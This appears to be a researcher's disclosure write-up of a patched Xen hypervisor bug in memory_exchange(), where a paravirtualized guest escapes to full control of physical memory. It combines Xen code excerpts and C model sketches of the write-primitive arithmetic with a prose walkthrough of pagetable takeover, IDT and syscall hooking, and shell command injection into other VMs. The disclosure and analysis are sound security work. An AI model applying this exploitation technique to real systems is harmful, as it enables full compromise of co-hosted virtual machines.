Pandavirtualization: Exploiting The Xen Hypervisor

Posted by Jann Horn

On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue on 2017-04-04.

To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests share the virtual address space with the hypervisor. The coarse memory layout looks as follows:

[Figure: coarse virtual memory layout of an x86-64 Xen PV guest]

Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.

Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:

access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
__copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:

    /*
     * Valid if in +ve half of 48-bit address space, or above Xen-reserved area.
     * This is also valid for range checks (addr, addr+size). As long as the
     * start address is outside the Xen-reserved area then we will access a
     * non-canonical address (and thus fault) before ever reaching VIRT_START.
     */
    #define __addr_ok(addr) \
        (((unsigned long)(addr) < (1UL<<47)) || \
         ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

    #define access_ok(addr, size) \
        (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

Xen normally only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the correct offset - checking the whole userspace buffer is unsafe!

Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).
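To make the difference between the two wrappers concrete, here is a minimal sketch in C that models them. It is a simplified model, not Xen's code: HV_VIRT_END is an assumed placeholder for the upper bound of the hypervisor-reserved area, the helper names addr_ok(), handle_okay() and handle_subrange_okay() are hypothetical, and the compat translation area and any sanity checks on the element count are ignored.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed upper bound of the hypervisor-reserved area (illustrative only). */
#define HV_VIRT_END 0xffff880000000000ULL

/* Models __addr_ok(): lower canonical half, or above the reserved area. */
static bool addr_ok(uint64_t addr)
{
    return addr < (1ULL << 47) || addr >= HV_VIRT_END;
}

/* Models guest_handle_okay(hnd, nr): only the address of element 0 is examined. */
static bool handle_okay(uint64_t base, uint64_t nr)
{
    (void)nr; /* in this model, the count does not influence the result */
    return addr_ok(base);
}

/* Models guest_handle_subrange_okay(hnd, first, last): the check starts at
 * element `first`, i.e. at the address where the access really begins. */
static bool handle_subrange_okay(uint64_t base, uint64_t first, uint64_t last,
                                 uint64_t elem_size)
{
    (void)last; /* the linear-access argument covers the rest of the range */
    return addr_ok(base + first * elem_size);
}
```

In this model, a base of 0 with a first index of 0xffff830000000000/8 passes handle_okay() but fails handle_subrange_okay(), because the access would really start inside the reserved area.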

When I saw the definition of access_ok(), the lack of security guarantees actually provided by access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.

Hypercall Preemption

When e.g. a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs some mechanism to delay the vCPU switch until it's safe to do so.

In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to schedule to another vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task, after adjusting the hypercall arguments (in guest registers or guest memory) so that as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.

This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.

This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.
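The re-entry scheme described above can be sketched in a few lines of C. This is only an illustrative model under stated assumptions: struct op_args, do_op() and the per-call budget are hypothetical stand-ins for a hypercall argument block, a long-running handler and the preemption check, and none of it is taken from Xen.

```c
#include <stddef.h>

/* Hypothetical argument block that lives in memory the caller controls. */
struct op_args {
    size_t nr_items; /* total number of items to process */
    size_t nr_done;  /* progress counter that doubles as the resume point */
};

#define OP_DONE      0
#define OP_PREEMPTED 1

/* Processes at most `budget` items per call, then asks to be re-invoked.
 * hits[i] counts how often item i was processed. */
static int do_op(struct op_args *args, size_t budget, size_t *hits)
{
    size_t i;

    for (i = args->nr_done; i < args->nr_items; i++) {
        if (budget == 0) {
            /* Save progress where the caller can see (and edit) it. */
            args->nr_done = i;
            return OP_PREEMPTED;
        }
        hits[i]++;
        budget--;
    }
    args->nr_done = i;
    return OP_DONE;
}
```

Because a fresh call and a resumed call look identical, a caller that sets nr_done to 7 before the first call makes the handler start at item 7. Any validation that assumed a start at item 0 no longer describes what the handler actually does.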

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA because DMA requires physically contiguous buffers.

The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:

    struct xen_memory_reservation {
        /* [...] */
        XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */

        /* Number of extents, and size/alignment of each (2^extent_order pages). */
        xen_ulong_t    nr_extents;
        unsigned int   extent_order;

        /* XENMEMF flags. */
        unsigned int   mem_flags;

        /*
         * Domain whose reservation is being changed.
         * Unprivileged domains can specify only DOMID_SELF.
         */
        domid_t        domid;
    };

    struct xen_memory_exchange {
        /*
         * [IN] Details of memory extents to be exchanged (GMFN bases).
         * Note that @in.address_bits is ignored and unused.
         */
        struct xen_memory_reservation in;

        /*
         * [IN/OUT] Details of new memory extents.
         * We require that:
         *  1. @in.domid == @out.domid
         *  2. @in.nr_extents  << @in.extent_order ==
         *     @out.nr_extents << @out.extent_order
         *  3. @in.extent_start and @out.extent_start lists must not overlap
         *  4. @out.extent_start lists GPFN bases to be populated
         *  5. @out.extent_start is overwritten with allocated GMFN bases
         */
        struct xen_memory_reservation out;

        /*
         * [OUT] Number of input extents that were successfully exchanged:
         *  1. The first @nr_exchanged input extents were successfully
         *     deallocated.
         *  2. The corresponding first entries in the output extent list correctly
         *     indicate the GMFNs that were successfully exchanged.
         *  3. All other input and output extents are untouched.
         *  4. If not all input extents are exchanged then the return code of this
         *     command will be non-zero.
         *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!
         */
        xen_ulong_t nr_exchanged;
    };

The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.

nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to decide at which point in the input arrays in.extent_start and out.extent_start it should resume.

Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):

    diff --git a/xen/common/memory.c b/xen/common/memory.c
    index 4e7c234..59379d3 100644
    --- a/xen/common/memory.c
    +++ b/xen/common/memory.c
    @@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)
             goto fail_early;
         }
     
    +    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
    +         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
    +    {
    +        rc = -EFAULT;
    +        goto fail_early;
    +    }
    +
         /* Only privileged guests can allocate multi-page contiguous extents. */
         if ( !multipage_allocation_permitted(current->domain,
                                              exch.in.extent_order) ||

The bug

As can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:

    static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)
    {
        [...]

        /* Various sanity checks. */
        [...]

        if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
             !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
        {
            rc = -EFAULT;
            goto fail_early;
        }

        [...]

        for ( i = (exch.nr_exchanged >> in_chunk_order);
              i < (exch.in.nr_extents >> in_chunk_order);
              i++ )
        {
            [...]

            /* Assign each output page to the domain. */
            for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )
            {
                [...]

                if ( !paging_mode_translate(d) )
                {
                    [...]

                    if ( __copy_to_guest_offset(exch.out.extent_start,
                                                (i << out_chunk_order) + j,
                                                &mfn, 1) )
                        rc = -EFAULT;
                }

                [...]
            }

            [...]
        }

        [...]
    }

However, the guest_handle_okay() check only checks whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing:

exch.in.extent_order and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
exch.in.nr_extents and exch.out.nr_extents as exch.nr_exchanged+1
exch.in.extent_start as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point to the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range and the hypervisor and guest kernel address ranges together are only as big as the userspace address range.
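The arithmetic in the list above can be checked with a short C sketch. It only reproduces the formulas from the text; struct exchange_params, choose_params() and write_address() are hypothetical names introduced for illustration and are not Xen types or functions.

```c
#include <stdint.h>

/* Hypothetical container for the guest-chosen fields (not a Xen type). */
struct exchange_params {
    uint64_t out_extent_start;
    uint64_t nr_exchanged;
    uint64_t nr_extents;      /* used for both in.nr_extents and out.nr_extents */
    uint64_t in_extent_start;
};

/* Applies the formulas from the text to a target address and a legitimate
 * guest kernel pointer (input_buffer). */
static struct exchange_params choose_params(uint64_t target_addr,
                                            uint64_t input_buffer)
{
    struct exchange_params p;

    p.out_extent_start = target_addr % 8;
    p.nr_exchanged     = target_addr / 8;
    p.nr_extents       = p.nr_exchanged + 1;
    /* Unsigned subtraction wraps modulo 2^64, like pointer arithmetic would. */
    p.in_extent_start  = input_buffer - 8 * p.nr_exchanged;
    return p;
}

/* Address at which the 8-byte page number ends up being written. */
static uint64_t write_address(const struct exchange_params *p)
{
    return p->out_extent_start + 8 * p->nr_exchanged;
}
```

For any target address, write_address() returns exactly that address, while out_extent_start itself stays between 0 and 7 and therefore passes a check that only looks at the start of the array.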

The value that is written to the attacker-controlled address is a physical page number (physical address divided by the page size).

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written by the kernel might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by seven bytes of garbage.

It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the following reasons:

x86-64 PV guests know the real physical page numbers of all pages they can access
x86-64 PV guests can map live pagetables (from all four paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections using which it is mapped in other places, by writing to physical_address+0xffff830000000000).

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call "victim pagetable") to a page to which the guest has write access (which I'll call "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.
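As a rough illustration of the values involved, the following C sketch computes where such an entry lives in the writable mapping of physical memory and what the 8-byte entry looks like. The mapping base comes from the text above; the flag bits are the standard x86-64 present/writable/user bits, but which flags are actually needed is an assumption here, and the helper names are hypothetical.

```c
#include <stdint.h>

#define DIRECTMAP_BASE 0xffff830000000000ULL /* writable mapping of all physical memory */
#define PAGE_SHIFT     12                    /* 4 KiB pages */
#define PTE_PRESENT    (1ULL << 0)
#define PTE_WRITABLE   (1ULL << 1)
#define PTE_USER       (1ULL << 2)

/* Hypervisor-virtual address through which a physical address is writable. */
static uint64_t directmap_addr(uint64_t phys_addr)
{
    return DIRECTMAP_BASE + phys_addr;
}

/* Builds a pagetable entry that points at the page with frame number `pfn`. */
static uint64_t make_pte(uint64_t pfn, uint64_t flags)
{
    return (pfn << PAGE_SHIFT) | flags;
}

/* Address of entry `index` in the pagetable stored in frame `table_pfn`;
 * each entry is 8 bytes wide. */
static uint64_t pte_slot_addr(uint64_t table_pfn, unsigned index)
{
    return directmap_addr((table_pfn << PAGE_SHIFT) + 8ULL * index);
}
```

For example, an entry for frame 0x1234 with all three flags set is 0x1234007, and entry 3 of a pagetable in frame 0x5 sits at 0xffff830000005018 in this mapping.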

Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.

Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.
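The two conversion steps can be simulated on an ordinary buffer. The sketch below is a model only: prim_write8() stands in for the uncontrolled 8-byte write using rand(), and all function names are hypothetical. It shows why retrying until the first byte reads back correctly, then moving on by one byte, yields controlled data followed by 7 bytes of garbage.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Simulated primitive: writes 1 uncontrolled byte plus 7 garbage bytes.
 * The caller must provide at least off + 8 bytes of buffer. */
static void prim_write8(uint8_t *mem, size_t off)
{
    for (int k = 0; k < 8; k++)
        mem[off + k] = (uint8_t)(rand() / (RAND_MAX / 256 + 1));
}

/* Step 1: retry until the first byte reads back as the wanted value. */
static void write_byte(uint8_t *mem, size_t off, uint8_t want)
{
    do {
        prim_write8(mem, off);
    } while (mem[off] != want);
}

/* Step 2: write bytes to consecutive addresses. Each later write clobbers
 * only bytes after the ones already fixed, so `len` controlled bytes remain,
 * followed by 7 garbage bytes. Requires off + len + 7 bytes of buffer. */
static void write_data(uint8_t *mem, size_t off, const uint8_t *data, size_t len)
{
    for (size_t i = 0; i < len; i++)
        write_byte(mem, off + i, data[i]);
}
```

Writing 9 bytes this way takes about 256 attempts per byte on average and leaves exactly the "9 controlled bytes followed by 7 bytes that don't matter" pattern described earlier.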

At this point, the attacker can control a live pagetable, which allows the attacker to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and all other VMs on the system.

Running shell commands in other VMs

At this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory; and a realistic attacker probably wouldn't want to inject code into VMs, considering how much more detectable that makes an attack.

But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to continue my exploit so that it injects a shell command into all other 64-bit PV domains.

As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.
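For readers unfamiliar with the IDT format, the sketch below shows how a 16-byte x86-64 interrupt gate encodes the handler address and the DPL. The layout follows the architectural gate descriptor format; the struct and function names are hypothetical, and the selector passed in is whatever code segment the handler should run with, which is not specified in the text.

```c
#include <stdint.h>

/* 64-bit mode interrupt gate descriptor (16 bytes, no padding needed). */
struct idt_gate {
    uint16_t offset_low;  /* handler address bits 15:0 */
    uint16_t selector;    /* code segment selector */
    uint8_t  ist;         /* bits 2:0: interrupt stack table index */
    uint8_t  type_attr;   /* bit 7: present, bits 6:5: DPL, bits 3:0: type */
    uint16_t offset_mid;  /* handler address bits 31:16 */
    uint32_t offset_high; /* handler address bits 63:32 */
    uint32_t reserved;
};

_Static_assert(sizeof(struct idt_gate) == 16, "gate must be 16 bytes");

#define GATE_PRESENT        0x80u
#define GATE_TYPE_INTERRUPT 0x0Eu

/* Encodes a present interrupt gate; DPL 3 lets user mode raise it with `int`. */
static struct idt_gate make_gate(uint64_t handler, uint16_t selector, unsigned dpl)
{
    struct idt_gate g;

    g.offset_low  = (uint16_t)(handler & 0xffff);
    g.selector    = selector;
    g.ist         = 0;
    g.type_attr   = (uint8_t)(GATE_PRESENT | ((dpl & 3u) << 5) | GATE_TYPE_INTERRUPT);
    g.offset_mid  = (uint16_t)((handler >> 16) & 0xffff);
    g.offset_high = (uint32_t)(handler >> 32);
    g.reserved    = 0;
    return g;
}

/* Reassembles the handler address from the three offset fields. */
static uint64_t gate_offset(const struct idt_gate *g)
{
    return (uint64_t)g->offset_low |
           ((uint64_t)g->offset_mid << 16) |
           ((uint64_t)g->offset_high << 32);
}
```

With a DPL of 3, the attribute byte comes out as 0xEE; with a DPL of 0 it would be 0x8E, and a software interrupt from a less privileged level would fault instead of reaching the handler.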

Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.

My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.

(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)

Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:

[Screenshot: successful attack against Qubes OS 3.2]

Conclusion

I believe that the root cause of this issue was the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems like old code tends to contain relatively straightforward weaknesses more often than newer code because it was committed with less scrutiny regarding security issues, and such old code is then often left alone.

When security-relevant code is optimized based on assumptions, care must be taken to reliably prevent those assumptions from being violated. access_ok() actually used to check whether the whole range overlaps hypervisor memory, which would have prevented this bug from occurring. Unfortunately, in 2005, a commit with "x86_64 fixes/cleanups" was made that changed the behavior of access_ok() on x86_64 to the current one. As far as I can tell, the only reason this didn't immediately make the MEMOP_increase_reservation and MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents argument of do_dom_mem_op() was only 32 bits wide - a relatively brittle defense.
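A quick calculation shows why a 32-bit count acts as an accidental defense. The C sketch below is an illustration under assumptions, not a reconstruction of the old code: it assumes 8-byte array elements and asks whether base + index*elem_size can jump from the lower half of the address space over the non-canonical hole, given an index limited to index_bits bits. The function name is hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define LOWER_HALF_END   (1ULL << 47)          /* first non-canonical address */
#define UPPER_HALF_START 0xffff800000000000ULL /* first canonical upper-half address */

/* Returns true if some index below 2^index_bits moves an access that starts
 * at `base` (in the lower half) to or beyond the start of the upper half. */
static bool can_reach_upper_half(uint64_t base, unsigned index_bits,
                                 uint64_t elem_size)
{
    uint64_t max_index, needed;

    assert(base < LOWER_HALF_END);
    assert(elem_size > 0);

    max_index = index_bits >= 64 ? UINT64_MAX : (1ULL << index_bits) - 1;
    /* Smallest index whose offset covers the distance to the upper half. */
    needed = (UPPER_HALF_START - base + elem_size - 1) / elem_size;
    return max_index >= needed;
}
```

With a 32-bit index and 8-byte elements, the largest possible offset is just under 2^35 bytes (32 GiB), far smaller than the hole, so the result is false; with a 64-bit index it is true, which is the situation memory_exchange() was in.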

While there have been several Xen vulnerabilities that only affected PV guests because the issues were in code that is unnecessary when dealing with HVM guests, I believe that this isn't one of them. Accessing guest virtual memory is much more straightforward for PV guests than for HVM guests: For PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds check followed by a memcpy with pagefault fixup - the same thing normal operating system kernels do when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to do a page-wise copy (because the memory area might be physically non-contiguous and the hypervisor doesn't have a contiguous virtual mapping of it) with guest pagetable walks (to translate guest virtual addresses to guest physical addresses) and guest frame lookups for every page, including reference counting, mapping guest pages into hypervisor memory and various checks to e.g. prevent HVM guests from writing to readonly grant mappings. So for HVM, the complexity of handling guest memory accesses is actually higher than for PV.

For security researchers, I think that a lesson from this is that paravirtualization is not much harder to understand than normal kernels. If you've audited kernel code before, the hypercall entry path (lstar_enter and int80_direct_trap in xen/arch/x86/x86_64/entry.S) and the basic design of hypercall handlers (for x86 PV: listed in the pv_hypercall_table in xen/arch/x86/pv/hypercall.c) should look more or less like normal syscalls.
